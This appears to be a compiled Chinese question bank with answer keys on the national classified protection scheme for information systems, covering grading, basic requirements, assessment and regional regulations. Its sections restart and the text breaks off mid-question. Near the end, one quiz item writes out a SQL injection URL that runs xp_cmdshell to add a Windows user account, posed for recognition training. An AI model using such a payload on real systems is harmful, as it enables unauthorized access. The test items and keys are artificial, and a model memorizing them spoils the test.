  22. 脆弱性分析技术,也被通俗地称为漏洞扫描技术。该技术是检测远程或本地系统安全脆弱性的一种安全技术。

    A.正确(正确答案,记住)

    B.错误(考试题库答案,考试时选)

  23. 信息系统安全等级保护实施的基本过程包括系统定级、 、安全实施、安全运维、系统终止。

    A.风险评估

    B.安全规划

    C.安全加固

    D.安全应急

  24. 安全规划设计基本过程包括 、安全总体设计、安全建设规划。

    A.项目调研

    B.概要设计

    C.需求分析

    D.产品设计

  25. 信息系统安全实施阶段的主要活动包括 、等级保护管理实施、等级保护技术实施、等级保护安全测评。

    A.安全方案详细设计

    B.系统定级核定

    C.安全需求分析

    D.产品设计

  26. 安全运维阶段的主要活动包括运行管理和控制、变更管理和控制、安全状态监控、 、安全检查和持续改进、监督检查。

    A.安全事件处置和应急预案

    B.安全服务

    C.网络评估

    D.安全加固

  27. 简述等级保护实施过程的基本原则包括, ,同步建设原则,重点保护原则,适当调整原则。

    A.自主保护原则

    B.整体保护原则

    C.一致性原则

    D.稳定性原则

二、多选题:

  1. 《计算机信息网络国际联网安全保护管理办法》规定,任何单位和个人不得从事下列危害计算机信息网络安全的活动:______。

    A.故意制作、传播计算机病毒等破坏性程序的

    B.未经允许,对计算机信息网络功能进行删除、修改或者增加的

    C.未经允许,对计算机信息网络中存储、处理或者传输的数据和应用程序进行删除、修改或者增加的

    D.未经允许,进入计算机信息网络或者使用计算机信息网络资源的

  2. 我国信息安全等级保护的内容包括______。

    A.对国家秘密信息、法人和其他组织及公民的专有信息以及公开信息和存储、传输和处理这些信息的信息系统分等级实行安全保护

    B.对信息系统中使用的信息安全产品实行按等级管理

    C.对信息安全从业人员实行按等级管理

    D.对信息系统中发生的信息安全事件按照等级进行响应和处置

    E.对信息安全违反行为实行按等级惩处

  3. 目前,我国在对信息系统进行安全等级保护时,划分了5个级别,包括______。

    A.专控保护级

    B.强制保护级

    C.监督保护级

    D.指导保护级

    E.自主保护级

答案

序号 1 2 3 4 5 6 7 8 9 10
答案 D B B C A B D B A C
序号 11 12 13 14 15 16 17 18 19 20
答案 D C B A A C C A A A
序号 21 22 23 24 25 26 27 28 29 30
答案 A B B C A A A ABCD ABCD ABCDE

三、定级指南

1**、**根据等级保护相关管理文件,信息系统的安全保护等级分为几个级别:(c)

A.3

B.4

C.5

D.6

2**、**等级保护对象受到破坏时所侵害的客体包括的三个方面为:(a b c)

  1. 公民、法人和其他组织的合法权益

B. 社会秩序、公共利益

C. 国家安全

D. 个人利益

3**、**等级保护对象受到破坏后对客体造成侵害的程度归结为哪三种(b c d)

A. 造成轻微损害

B. 造成一般损害

C. 造成严重损害

D. 造成特别严重损害

4**、**根据定级指南,信息系统安全包括哪两个方面的安全:(a b)

A、业务信息安全

B、系统服务安全

C、系统运维安全

D、系统建设安全

5**、**作为定级对象的信息系统应具有如下基本特征:(a b c)

A、具有唯一确定的安全责任单位

B、具有信息系统的基本要素

C、承载单一或相对独立的业务应用

D、单位具有独立的法人

6、以下哪一项不属于侵害国家安全的事项(d)

A、影响国家政权稳固和国防实力

B、影响国家统一、民族团结和社会安定

C、影响国家对外活动中的政治、经济利益

D、影响各种类型的经济活动秩序

7**、**以下哪一项不属于侵害社会秩序的事项(a)

A、影响国家经济竞争力和科技实力

B、影响各种类型的经济活动秩序

C、影响各行业的科研、生产秩序

D、影响公众在法律约束和道德规范下的正常生活秩序等

8、以下哪一项不属于影响公共利益的事项(d)

A、影响社会成员使用公共设施

B、影响社会成员获取公开信息资源

C、影响社会成员接受公共服务等方面

D、影响国家重要的安全保卫工作

9**、**信息安全和系统服务安全受到破坏后,可能产生以下危害后果(a b c d)

A、影响行使工作职能

B.导致业务能力下降

C.引起法律纠纷

D.导致财产损失

10**、**进行等级保护定义的最后一个环节是:(b)

A、信息系统的安全保护等级由业务信息安全保护等级和系统服务安全保护等级的较低者决定

B、信息系统的安全保护等级由业务信息安全保护等级和系统服务安全保护等级的较高者决定

C、信息系统的安全保护等级由业务信息安全保护等级决定

D、信息系统的安全保护等级由系统服务安全保护等级决定

11**、**信息安全等级保护工作直接作用的具体的信息和信息系统称为(c)

A、客体

B、客观方面

C、等级保护对象

D、系统服务

12**、**受法律保护的、等级保护对象受到破坏时所侵害的社会关系,如国家安全、社会秩序、公共利益以及公民、法人或其他组织的合法权益,称为(a)

A、客体

B、客观方面

C、等级保护对象

D、系统服务

13**、**对客体造成侵害的客观外在表现,包括侵害方式和侵害结果等,称为(b)

A、客体

B、客观方面

C、等级保护对象

D、系统服务

14**、**信息系统为支撑其所承载业务而提供的程序化过程,称为(d)

A、客体

B、客观方面

C、等级保护对象

D、系统服务

15**、**信息系统受到破坏后,会对社会秩序和公共利益造成特别严重损害,或者对国家安全造成严重损害,在等保定义中应定义为第几级(d)

A、第一级

B、第二级

C、第三级

D、第四级

E、第五级

16**、**信息系统受到破坏后,会对国家安全造成特别严重损害,在等保定义中应定义为第几级(e)

A、第一级

B、第二级

C、第三级

D、第四级

E、第五级

17**、**信息系统受到破坏后,会对公民、法人和其他组织的合法权益造成损害,但不损害国家安全、社会秩序和公共利益,在等保定义中应定义为第几级(a)

A、第一级

B、第二级

C、第三级

D、第四级

E、第五级

18**、**信息系统受到破坏后,会对公民、法人和其他组织的合法权益产生严重损害,或者对社会秩序和公共利益造成损害,但不损害国家安全,在等保定义中应定义为第几级(b)

A、第一级

B、第二级

C、第三级

D、第四级

E、第五级

19**、**信息系统受到破坏后,会对社会秩序和公共利益造成严重损害,或者对国家安全造成损害,在等保定义中应定义为第几级(c)

A、第一级

B、第二级

C、第三级

D、第四级

E、第五级

20**、**对公民、法人和其他组织的合法权益造成一般损害,定义为几级(a)

A、第一级

B、第二级

C、第三级

D、第四级

E、第五级

21**、**对公民、法人和其他组织的合法权益造成特别严重损害,定义为几级(b)

A、第一级

B、第二级

C、第三级

D、第四级

E、第五级

22**、**对社会秩序、公共利益造成一般损害,定义为几级(b)

A、第一级

B、第二级

C、第三级

D、第四级

E、第五级

23**、**对社会秩序、公共利益造成特别严重损害,定义为几级(d)

A、第一级

B、第二级

C、第三级

D、第四级

E、第五级

24**、**对国家安全造成一般损害,定义为几级(c)

A、第一级

B、第二级

C、第三级

D、第四级

E、第五级

25**、**对国家安全造成特别严重损害,定义为几级(e)

A、第一级

B、第二级

C、第三级

D、第四级

E、第五级

26**、**从业务信息安全角度反映的信息系统安全保护等级称(d)

A、安全等级保护

B、信息系统等级保护

C、系统服务安全保护等级

D、业务信息安全保护等级

27**、**从系统服务安全角度反映的信息系统安全保护等级称(c)

A、安全等级保护

B、信息系统等级保护

C、系统服务安全保护等级

D、业务信息安全保护等级

28**、**一个单位内运行的信息系统可能比较庞大,为了体现重要部分重点保护,有效控制信息安全建设成本,优化信息安全资源配置的等级保护原则,可采取什么样的定级措施(a)

A、可将较大的信息系统划分为若干个较小的、可能具有不同安全保护等级的定级对象

B、作为一个信息系统来定级

29**、**确定作为定级对象的信息系统受到破坏后所侵害的客体时,应首先判断是否侵害国家安全(a)

A、国家安全

B、社会秩序或公众利益

C、公民、法人和其他组织的合法权益

30**、**在信息系统的运行过程中,安全保护等级是否需要随着信息系统所处理的信息和业务状态的变化进行适当的变更。(a)

A、需要

B、不需要

四、基本要求

一、选择题

1、《基本要求》分为技术要求和管理要求,其中技术要求包括物理安全、网络安全、主机系统安全、应用安全和 ?

A、整体安全 B、数据安全 C、操作系统安全 D、数据库安全

2、《基本要求》中管理要求中,下面那一个不是其中的内容?

A、安全管理机构 B、安全管理制度 C、人员安全管理 D、病毒安全管理

3、技术类安全要求按其保护的测重点不同,将依据三类控制点进行分类,其中S类代表是业务信息安全类,A类代表是什么?

A、通用安全保护等级B、业务服务保证类(应为系统服务保证类)C、用户服务保证类D业务安全保证类

4、物理层面安全要求包括物理位置、物理访问控制、防盗窃和防破坏等,其中不是物理安全范围的是什么?

A、防静电 B、防火 C、防水和防潮 D、防攻击

5、应能够防护系统免受来自外部小型组织的、拥有少量资源的威胁源发起的恶意攻击、一般的自然灾难,所造成的重要资源损害,能够发现重要的安全漏洞和安全事件,在系统遭到损害后,能够在一段时间内恢复部分功能是几级要求。

A、 一级 B、 二级 C、三级 D、四级

6、网络安全主要关注的方面包括:结构安全、访问控制、安全审计、边界完整性检查、入侵防范、恶意代码防范、 等七个控制点。

A、网络设备防护 B、网络设备自身安全C、网络边界D、网络数据

7、管理要求包括 项?(应为基本要求包括多少类?)

A、10 B、11 C、12 D、13

8、《测评准则》和 是对用户系统测评的依据 (《测评准则》现已被《测评要求》替代)

A、《信息系统安全等级保护实施指南》

B、《信息系统安全保护等级定级指南》

C、《信息系统安全等级保护基本要求》

D、《信息系统安全等级保护管理办法》

9、应用安全包括身份鉴别、访问控制、安全审计、剩余信息保护、通信完整性、通信保密性和_____。

A、抗抵赖、软件容错、资源控制

B、不可否认性、软件容错、资源控制

C、抗抵赖、软件删除、资源控制

D、抗抵赖、软件容错、系统控制

10、安全管理机构包括_____控制点

A、3 B、4 C、5 D、6

11、《基本要求》是针对一至 级的信息系统给出基本的安全保护要求。(注意《基本要求》第9章为空白)

A、2 B、3 C、4 D、5

12、基本要求的选择和使用中,定级结果为S3A2,保护类型应该是 。

A、 S3A2G1 B 、S3A2G2 C、S3A2G3 D、S3A2G4

13、二级信息系统保护要求的组合包括: S1A2G2,S2A2G2, 。

A、S2A1G2 B、S1A2G3 C、S2A2G3 D、S2A3G2

14、安全管理制度主要包括:管理制度、制定和发布、 三个控制点。

A、评审和修订 B、修改 C、 审核 D、 阅读

15、数据安全包括:数据完整性、数据保密性、 。

A、数据备份 B、数据机密性 C、数据不可否认性 D、数据删除性

16、结构安全、访问控制、安全审计是 层面的要求。(注意:主机安全和应用安全均有访问控制和安全审计控制点,但没有结构安全控制点。结构安全控制点是网络安全类独有控制点)

A、网络 B、主机 C、 系统 D、物理

17、电磁防护是 层面的要求。

A、网络 B、主机 C、 系统 D、物理

18、运营、使用单位应当参照《信息安全技术信息系统安全管理要求》

GB/T20269-2006)、《信息安全技术信息系统安全工程管理要求》 管理规范,制定并落实符合本系统安全保护等级要求的安全管理制度

A、测评准则 B、基本要求 C、定级指南 D、实施指南

19、主机系统安全涉及的控制点包括:身份鉴别、安全标记、访问控制、可信路径、安全审计等 个控制点

A、8 B、9 C、10 D、7

20 、数据安全及备份恢复涉及到 、 、 3个控制点

A、数据完整性 数据保密性 备份和恢复

B、数据完整性 数据保密性 不可否认性

C、数据完整性 不可否认性 备份和恢复

D、不可否认性 数据保密性 备份和恢复

21、______标准为评估机构提供等级保护评估依据。

A、基本要求 B、测评指南 C、评估实施指南 D、定级指南

22、人员管理主要是对人员的录用、人员的离岗、 、安全意识教育和培训、第三方人员访问管理5个方面

A、人员教育 B、人员裁减 C、人员考核 D、人员审核

23、安全管理制度包括管理制度、制定和发布和_______

A、审核 B、评审和修订 C、 修订 D、评审

24、每个级别的信息系统按照 进行保护后,信息系统具有相应等级的基本安全保护能力,达到一种基本的安全状态。

A、基本要求 B、分级要求 C、测评准则 D、实施指南

25、《基本要求》的管理部分包括安全管理机构、安全管理制度、人员安全管理

、系统建设管理、__________。

A、系统运维 B、人员录用 C、管理运行 D、系统运行

26、环境管理、资产管理、介质管理都属于安全管理部分的_______管理。

A、人员管理 B、安全管理机构 C安全管理制度、 D、系统运维管理

27、系统建设管理中要求,对新建系统首先要进行______,在进行方案设计。

A、定级 B、规划 C、需求分析 D、测评

28、从___级系统开始,基本要求中有规定要作异地备份。

A、2 B、3 C、4 D、5

29、系统定级、安全方案设计、产品采购等是______部分要求。

A、系统建设管理 B、系统运维 C、数据安全 D、主机安全

30、四级系统中,物理安全要求共有________项

A、8 B、9 C、10 D、11

答案:

1、B 2、D 3、B 4、D、 5、B 6、A 7、A 8、C 9、A 10、C

11、C 12、C 13、A 14、A 15、A 16、A 17、D 18、B 19、B

20、A 21、A 22、C 23、B 24、A 25、A 26、D 27、A 28、B

29、A 30、C

五、测评准则**(已被《测评要求》替代)**

1、《信息安全等级保护管理办法》中要求,第三级信息系统应当每年至少进行 A 次等级测评

A、一 B、二 C、三 D、四

2、《信息安全等级保护管理办法》中要求第三级以上信息系统应当选择符合下列条件 C、D 的等级保护测评机构进行测评:

A、在中华人民共和国境内注册成立;

B、由中国公民投资、中国法人投资或者国家投资的企事业单位;

C、具有完备的保密管理、项目管理、质量管理、人员管理和培训教育等安全管理制度;

D、工作人员仅限于中国公民。

3、《信息安全等级保护管理办法》中要求从事信息系统安全等级测评的机构,应当履行下列 A、B、C、D 义务。

A、遵守国家有关法律法规和技术标准,提供安全、客观、公正的检测评估服务,保证测评的质量和效果。

B、保守在测评活动中知悉的国家秘密、商业秘密和个人隐私。

C、防范测评风险。

D、对测评人员进行安全保密教育,与其签订安全保密责任书,规定应当履行的安全保密义务和承担的法律责任,并负责检查落实。

4、《广东省公安厅关于计算机信息系统安全保护的实施办法》规定测评机构实施 B 制度。

A、审批 B、备案 C、审批+备案

5、在《广东省公安厅关于计算机信息系统安全保护的实施办法》中规定第 B 级以上的计算机信息系统建设完成后,使用单位应当委托符合规定的测评机构安全测评合格方可投入使用。

A、一 B、二 C、三 D、四

6、计算机信息系统运营、使用单位委托安全测评机构测评,应当提交下列资料的主要有:A、B、C、D 。

A、安全测评委托书。

B、定级报告。

C、计算机信息系统应用需求、系统结构拓扑及说明、系统安全组织结构和管理制度、安全保护设施设计实施方案或者改建实施方案、系统软件硬件和信息安全产品清单。

D、安全策略文档。

7、信息安全等级测评机构对计算机信息系统进行使用前安全测评,应当预先报告 B 公共信息网络安全监察部门。

A、县级以上公安机关 B、地级以上市公安机关

C、省公安厅 D、公安部

8、信息安全等级测评机构有下列行为之一的 A、B、C、D ,由所在地公安机关公共信息网络安全监察部门责令改正,并予以通报。对已办理备案的,收回备案证书。触犯有关法律、法规和规章的,依法追究法律责任。

A、伪造、冒用信息安全等级测评机构备案证书的;

B、转让、转借信息安全等级测评机构备案证书的;

C、出具虚假、失实的信息安全等级测评结论的;

D、泄露测评活动中掌握的国家秘密、商业秘密和个人隐私的;

9、计算机信息系统投入使用后,存在下列情形之一的A、B、C、D ,应当进行安全自查,同时委托安全测评机构进行安全测评:

A、变更关键部件。

B、安全测评时间满一年。

C、发生危害计算机信系统安全的案件或安全事故。

D、公安机关公共信息网络安全监察部门根据应急处置工作的需要认为应当进行安全测评。

**10、**申请单位认为安全测评报告的合法性和真实性存在重大问题的,可以向 A 公共信息网络安全监察部门提出申诉,提交异议申诉书及有关证明材料。

A、本单位所在地公安机关 B、地级以上市公安机关

C、省公安厅 D、公安部

11、等级保护测评的执行主体最好选择: B 。

A、独立的第三方测评服务机构。

B、具有相关资质的、独立的第三方测评服务机构。

C、从事系统集成和信息安全产品开发等安全服务机构。

D、具有相关资质的、从事系统集成和信息安全产品开发等安全服务机构。

12、安全保护等级为第三级以上的计算机信息系统应当选用符合下列条件 A、B、C、D 的安全专用产品:

A、产品研制、生产单位是由中国公民、法人投资或者国家投资或者控股的,在中华人民共和国境内具有独立的法人资格。

B、产品的核心技术、关键部件具有我国自主知识产权。

C、产品研制、生产单位及其主要业务、技术人员无犯罪记录。

D、产品研制、生产单位声明没有故意留有或者设置漏洞、后门、木马等程序和功能。

13、三级及以上信息系统的物理访问控制应满足以下 A、B、C、D 要求:

A、机房出入口应安排专人值守,控制、鉴别和记录进入的人员。

B、需进入机房的来访人员应经过申请和审批流程,并限制和监控其活动范围。

C、应对机房划分区域进行管理,区域和区域之间设置物理隔离装置,在重要区域前设置交付或安装等过渡区域。

D、重要区域应配置电子门禁系统,控制、鉴别和记录进入的人员。

14、三级及以上信息系统的网络安全审计应满足以下 A、B、C、D 要求:

A、应对网络系统中的网络设备运行状况、网络流量、用户行为等进行日志记录;

B、审计记录应包括:事件的日期和时间、用户、事件类型、事件是否成功及其他与审计相关的信息;

C、应能够根据记录数据进行分析,并生成审计报表;

D、应对审计记录进行保护,避免受到未预期的删除、修改或覆盖等。

15、三级及以上信息系统的应用安全身份鉴别应满足以下 A、B、C、D 要求:

A、应对同一用户采用两种或两种以上组合的鉴别技术实现用户身份鉴别;

B、应提供用户身份标识唯一和鉴别信息复杂度检查功能,保证应用系统中不存在重复用户身份标识,身份鉴别信息不易被冒用;

C、应提供登录失败处理功能,可采取结束会话、限制非法登录次数和自动退出等措施;

D、应启用身份鉴别、用户身份标识唯一性检查、用户身份鉴别信息复杂度检查以及登录失败处理功能,并根据安全策略配置相关参数。

16、三级及以上信息系统的应用安全资源控制应满足以下 A、B、C、D 要求:

A、应能够对一个时间段内可能的并发会话连接数进行限制。

B、应能够对一个访问帐户或一个请求进程占用的资源分配最大限额和最小限额。

C、应能够对系统服务水平降低到预先规定的最小值进行检测和报警。

D、应提供服务优先级设定功能,并在安装后根据安全策略设定访问帐户或请求进程的优先级,根据优先级分配系统资源。

17、三级信息系统的人员录用应满足以下要求:A、B、C。

A、应指定或授权专门的部门或人员负责人员录用。

B、应严格规范人员录用过程,对被录用人的身份、背景、专业资格和资质等进行审查,对其所具有的技术技能进行考核。

C、应签署保密协议。

D、可从所有人员中选拔从事关键岗位的人员,并签署岗位安全协议。

18、三级信息系统的管理制度包括如下 A、B、C 内容。

A、应制定信息安全工作的总体方针和安全策略,说明机构安全工作的总体目标、范围、原则和安全框架等;

B、应对安全管理活动中的各类管理内容建立安全管理制度;

C、应对要求管理人员或操作人员执行的日常管理操作建立操作规程;

D、应形成由安全策略、管理制度、操作规程等构成的全面的信息安全管理制度体系。

19、三级信息系统的系统定级包括如下 A、B、C、D 内容。

A、应明确信息系统的边界和安全保护等级。

B、应以书面的形式说明确定信息系统为某个安全保护等级的方法和理由。

C、应组织相关部门和有关安全技术专家对信息系统定级结果的合理性和正确性进行论证和审定。

D、应确保信息系统的定级结果经过相关部门的批准。

20、三级信息系统的外包软件开发包括如下 A、B、C、D 内容。

A、应根据开发需求检测软件质量。

B、应在软件安装之前检测软件包中可能存在的恶意代码。

C、应要求开发单位提供软件设计的相关文档和使用指南。

D、应要求开发单位提供软件源代码,并审查软件中可能存在的后门。

21、三级信息系统的恶意代码防范管理包括如下 A、B、C、D 内容。

A、应提高所有用户的防病毒意识,及时告知防病毒软件版本,在读取移动存储设备上的数据以及网络上接收文件或邮件之前,先进行病毒检查,对外来计算机或存储设备接入网络系统之前也应进行病毒检查。

B、应指定专人对网络和主机进行恶意代码检测并保存检测记录。

C、应对防恶意代码软件的授权使用、恶意代码库升级、定期汇报等作出明确规定。

D、应定期检查信息系统内各种产品的恶意代码库的升级情况并进行记录,对主机防病毒产品、防病毒网关和邮件防病毒网关上截获的危险病毒或恶意代码进行及时分析处理,并形成书面的报表和总结汇报。

22、对三级信息系统的人员配备包括如下 A、B、C、D 内容。

A、应配备一定数量的系统管理员、网络管理员、安全管理员等。

B、应配备专职安全管理员,不可兼任。

C、关键事务岗位应配备多人共同管理。

D、应配备系统审计员,加强对管理员工作的监督。

23、三级信息系统的测试验收包括如下 A、B、C、D 内容。

A、应委托公正的第三方测试单位对系统进行安全性测试,并出具安全性测试报告;

B、在测试验收前应根据设计方案或合同要求等制订测试验收方案,在测试验收过程中应详细记录测试验收结果,并形成测试验收报告;

C、应指定或授权专门的部门负责系统测试验收的管理,并按照管理规定的要求完成系统测试验收工作;

D、应组织相关部门和相关人员对系统测试验收报告进行审定,并签字确认。

24、三级信息系统的等级测评包括如下 A、B、C、D 内容

A、在系统运行过程中,应至少每年对系统进行一次等级测评,发现不符合相应等级保护标准要求的及时整改。

B、应在系统发生变更时及时对系统进行等级测评,发现级别发生变化的及时调整级别并进行安全改造,发现不符合相应等级保护标准要求的及时整改。

C、应选择具有国家相关技术资质和安全资质的测评单位进行等级测评。

D、应指定或授权专门的部门或人员负责等级测评的管理。

25、三级信息系统的安全服务商选择包括如下 A、B、C、D 内容

A、应确保安全服务商的选择符合国家的有关规定。

B、应与选定的安全服务商签订与安全相关的协议,明确约定相关责任。

C、应确保选定的安全服务商提供技术培训和服务承诺,必要的与其签订服务合同。

D、应确保选定的安全服务商提供质量保证。

26、信息安全等级保护测评方法,以下哪种表述最完整: D 。

A、访谈 B、检查 C测试 D、访谈、检查和测试

27、信息安全等级保护测评工作原则,主要包括: A、B、C、D 。

A、规范性原则 B、整体性原则 C、最小影响原则 D、保密性原则

28、等级测评实施过程中可能存在的风险,主要有: A、B、C 。

A、验证测试影响系统正常运行

B、工具测试影响系统正常运行

C、敏感信息泄漏

29、某信息系统1被定为3级,测评的指标选择可能有: A、B、C、D 。

A、S3A3G3 B、S3A1G3 C、S3A2G3 D、S1A3G3

30、等级保护测评准则的作用,主要有: A、B、C、D 。

A、指导系统运营使用单位进行自查

B、指导评估机构进行检测评估

C、监管职能部门参照进行监督检查

D、规范测评内容和行为

一、法律法规

一、单选题

1.根据《信息安全等级保护管理办法》,(A)负责信息安全等级保护工作的监督、检查、指导。

A.公安机关

B.国家保密工作部门

C.国家密码管理部门

2.根据《信息安全等级保护管理办法》,(D)应当依照相关规范和标准督促、检查、指导本行业、本部门或本地区信息系统运营、使用单位的信息安全等级保护工作。

A.公安机关

B.国家保密工作部门

C.国家密码管理部门

D.信息系统的主管部门

3.计算机信息系统安全保护等级根据计算机信息系统在国家安全、经济建设、社会生活中的_______,计算机信息系统受到破坏后对国家安全、社会秩序、公共利益以及公民、法人和其他组织的合法权益的_______等因素确定。(B)

A.经济价值 经济损失

B.重要程度 危害程度

C.经济价值 危害程度

D.重要程度 经济损失

4.对拟确定为(D)以上信息系统的,运营、使用单位或者主管部门应当请国家信息安全保护等级专家评审委员会评审。

A.第一级

B.第二级

C.第三级

D.第四级

5.一般来说,二级信息系统,适用于(D)

A.乡镇所属信息系统、县级某些单位中不重要的信息系统。小型个体、私营企业中的信息系统。中小学中的信息系统。

B.适用于地市级以上国家机关、企业、事业单位内部重要的信息系统;重要领域、重要部门跨省、跨市或全国(省)联网运行的信息系统;跨省或全国联网运行重要信息系统在省、地市的分支系统;各部委官方网站;跨省(市)联接的信息网络等。

C.适用于重要领域、重要部门三级信息系统中的部分重要系统。例如全国铁路、民航、电力等调度系统,银行、证券、保险、税务、海关等部门中的核心系统。

D.地市级以上国家机关、企业、事业单位内部一般的信息系统。例如小的局域网,非涉及秘密、敏感信息的办公系统等。

6.信息系统建设完成后,(A)的信息系统的运营使用单位应当选择符合国家规定的测评机构进行测评合格方可投入使用。

A.二级以上

B.三级以上

C.四级以上

D.五级以上

7.安全测评报告由(D)报地级以上市公安机关公共信息网络安全监察部门。

A.安全服务机构

B.县级公安机关公共信息网络安全监察部门

C.测评机构

D.计算机信息系统运营、使用单位

8.新建( )信息系统,应当在投入运行后( ),由其运营、使用单位到所在地设区的市级以上公安机关办理备案手续。(D)

A.第一级以上30日内

B.第二级以上60日内

C.第一级以上60日内

D.第二级以上30日内

9.根据《广东省计算机信息系统安全保护条例》规定,计算机信息系统的运营、使用单位没有向地级市以上人民政府公安机关备案的,由公安机关处以(D)

A.警告

B.拘留15日

C.罚款1500元

D.警告或者停机整顿

二、多选题

1.根据《关于信息安全等级保护的实施意见》,信息系统安全等级保护应当遵循什么原则?(ABCD)

A.明确责任,共同保护

B.依照标准,自行保护

C.同步建设,动态调整

D.指导监督,保护重点

2.根据《信息安全等级保护管理办法》,关于信息系统安全保护等级的划分,下列表述正确的是(ABCDE)。

A.第一级,信息系统受到破坏后,会对公民、法人和其他组织的合法权益造成损害,但不损害国家安全、社会秩序和公共利益

B.第二级,信息系统受到破坏后,会对公民、法人和其他组织的合法权益产生严重损害,或者对社会秩序和公共利益造成损害,但不损害国家安全

C.第三级,信息系统受到破坏后,会对社会秩序和公共利益造成严重损害,或者对国家安全造成损害

D.第四级,信息系统受到破坏后,会对社会秩序和公共利益造成特别严重损害,或者对国家安全造成严重损害

E.第五级,信息系统受到破坏后,会对国家安全造成特别严重损害

3.根据《广东省计算机信息系统安全保护条例》,计算机信息系统(ABCD)应当同步落实相应的安全措施。

A.规划

B.设计

C.建设

D.维护

4.经测评,计算机信息系统安全状况未达到国家有关规定和标准的要求的,(AB)

A.委托单位应当根据测评报告的建议,完善计算机信息系统安全建设

B.重新提出安全测评委托

C.另行委托其他测评机构进行测评

D.自行进行安全测评

5.根据《广东省信息安全等级测评工作细则》,关于测评和自查工作,以下表述正确的是(ABCD)。

A.第三级计算机信息系统应当每年至少进行一次安全自查和安全测评

B.第四级计算机信息系统应当每半年至少进行一次安全自查和安全测评

C.第五级计算机信息系统应当依据特殊安全要求进行安全自查和安全测评

D.自查报告连同测评报告应当由计算机信息系统运营、使用单位报地级以上市公安机关公共信息网络安全监察部门

6.根据《广东省公安厅关于计算机信息系统安全保护的实施办法》,关于公安机关的进行安全检查的要求,下列表述正确的是(ABCD)。

A.对第三级计算机信息系统每年至少检查一次

B.对第四级计算机信息系统每半年至少检查一次

C.对第五级计算机信息系统,应当会同国家指定的专门部门进行检查

D.对其他计算机信息系统应当不定期开展检查

7.根据《广东省计算机信息系统安全保护条例》,计算机信息系统的运营、使用单位接到公安机关要求整改的通知后拒不按要求整改的,由公安机关处以(CD)。

A.罚款5000元

B.拘留15日

C.警告

D.停机整顿

8.根据《广东省计算机信息系统安全保护条例》规定,第二级以上计算机信息系统的运营、使用单位计算机信息系统投入使用前未经符合国家规定的安全等级测评机构测评合格的 ,由公安机关(ABCDE)。

A.责令限期改正,给予警告

B.逾期不改的,对单位的主管人员、其他直接责任人员可以处五千元以下罚款,对单位可以处一万五千元以下罚款

C.有违法所得的,没收违法所得

D.情节严重的,并给予六个月以内的停止联网、停机整顿的处罚

E.必要时公安机关可以建议原许可机构撤销许可或者取消联网资格

9.根据《广东省公安厅关于计算机信息系统安全保护的实施办法》,信息安全等级测评机构申请备案(AB)

A.一般应当向地级以上市公安机关公共信息网络安全监察部门提出申请

B.承担省直和中央驻粤单位信息安全等级测评工作的机构,直接向省公安厅公共信息网络安全监察部门提出申请

C.一般应当向公安部公共信息网络安全监察部门提出申请

D.一般应当向县级以上市公安机关公共信息网络安全监察部门提出申请

10.根据《信息安全等级保护管理办法》,安全保护等级为第三级以上的计算机信息系统应当选用符合下列条件的安全专用产品:(ABCDE)

A.产品研制、生产单位是由中国公民、法人投资或者国家投资或者控股的,在中华人民共和国境内具有独立的法人资格

B.产品的核心技术、关键部件具有我国自主知识产权

C.产品研制、生产单位及其主要业务、技术人员无犯罪记录

D.产品研制、生产单位声明没有故意留有或者设置漏洞、后门、木马等程序和功能

E.对国家安全、社会秩序、公共利益不构成危害

三、判断题

1.根据《信息安全等级保护管理办法》,第三级信息系统运营、使用单位应当依据国家管理规范和技术标准进行保护,国家有关信息安全职能部门对其信息安全等级保护工作进行强制监督、检查。(×)

2.根据《信息安全等级保护管理办法》,国家保密工作部门负责等级保护工作中有关保密工作的监督、检查、指导(√)

3.根据《信息安全等级保护管理办法》,信息系统的运营、使用单位应当根据本办法和有关标准,确定信息系统的安全保护等级并报公安机关审核批准。(×)

4.根据《信息安全等级保护管理办法》,信息系统的运营、使用单位应当根据已确定的安全保护等级,依照本办法和有关技术标准,使用符合国家有关规定,满足信息系统安全保护等级需求的信息技术产品,进行信息系统建设。(√)

5.根据《信息安全等级保护管理办法》,第十五条 已运营(运行)的第二级以上信息系统,应当在安全保护等级确定后30日内,由其运营、使用单位到所在地设区的市级以上公安机关办理备案手续(√)

6.根据《信息安全等级保护管理办法》,公安机关应当掌握信息系统运营、使用单位的备案情况,发现不符合本办法及有关标准的,应建议其予以纠正。(×)

7.根据《信息安全等级保护管理办法》,公安机关检查发现信息系统安全保护状况不符合信息安全等级保护有关管理规范和技术标准的,应当向运营、使用单位发出整改通知(√)

8.信息系统运营、使用单位应当依照相关规定和标准和行业指导意见自主确定信息系统的安全保护等级。即使有主管部门的,也不必经主管部门审核批准。(×)

二、实施指南

一、单选题:

  1. 1999年,我国发布的第一个信息安全等级保护的国家标准GB 17859 — 1999,提出将信息系统的安全等级划分为______个等级,并提出每个级别的安全功能要求。

    A.7

    B.8

    C.6

    D.5

  2. 等级保护标准GB 17859主要是参考了______而提出。

    A.欧洲ITSEC

    B.美国TCSEC

    C.CC

    D.BS 7799

  3. 信息安全等级保护的5个级别中,______是最高级别,属于关系到国计民生的最关键信息系统的保护。

    A.强制保护级

    B.专控保护级

    C.监督保护级

    D.指导保护级

    E.自主保护级

  4. 《信息系统安全等级保护实施指南》将______作为实施等级保护的第一项重要内容。

    A.安全定级

    B.安全评估

    C.安全规划

    D.安全实施

  5. ______是进行等级确定和等级保护管理的最终对象。

    A.业务系统

    B.功能模块

    C.信息系统

    D.网络系统

  6. 当信息系统中包含多个业务子系统时,对每个业务子系统进行安全等级确定,最终信息系统的安全等级应当由______所确定。

    A.业务子系统的安全等级平均值

    B.业务子系统的最高安全等级

    C.业务子系统的最低安全等级

    D.以上说法都错误

  7. 关于资产价值的评估,______说法是正确的。

    A.资产的价值指采购费用

    B.资产的价值无法估计

    C.资产价值的定量评估要比定性评估简单容易

    D.资产的价值与其重要性密切相关

    1. 对以下URL的说明正确的是:http://192.168.1.77/show.asp?id=52;exec master.dbo.xp_cmdshell ‘net user test /add’ ( )【BCD】
      A、试图通过操作系统cmd.exe来添加帐户
      B、试图通过该URL实施SQL注入攻击
      C、试图调用xp_cmdshell存储过程执行系统命令
      D、试图增加test帐户
    2. 应从哪几方面审计windows系统是否存在后门( )【ABCD】
      A.查看服务信息
      B.查看驱动信息
      C.查看注册表键值
      D.查看进程信息
    3. 在Apache上,有个非常重要的安全模块Mod_Security ,下面哪些是这个模块具备的功能:( )【BCD】
      A、基于IP的访问控制
      B、缓冲区溢出的保护
      C、对SQL注入有一定的防止作用
      D、对请求方法和请求内容,进行过滤控制

    Oracle数据库中如何设置audit trail审计,正确的说法是:( )【ABD】
    A、在init.ora文件中设置”audit_trail = true”或者”audit_trail = db”
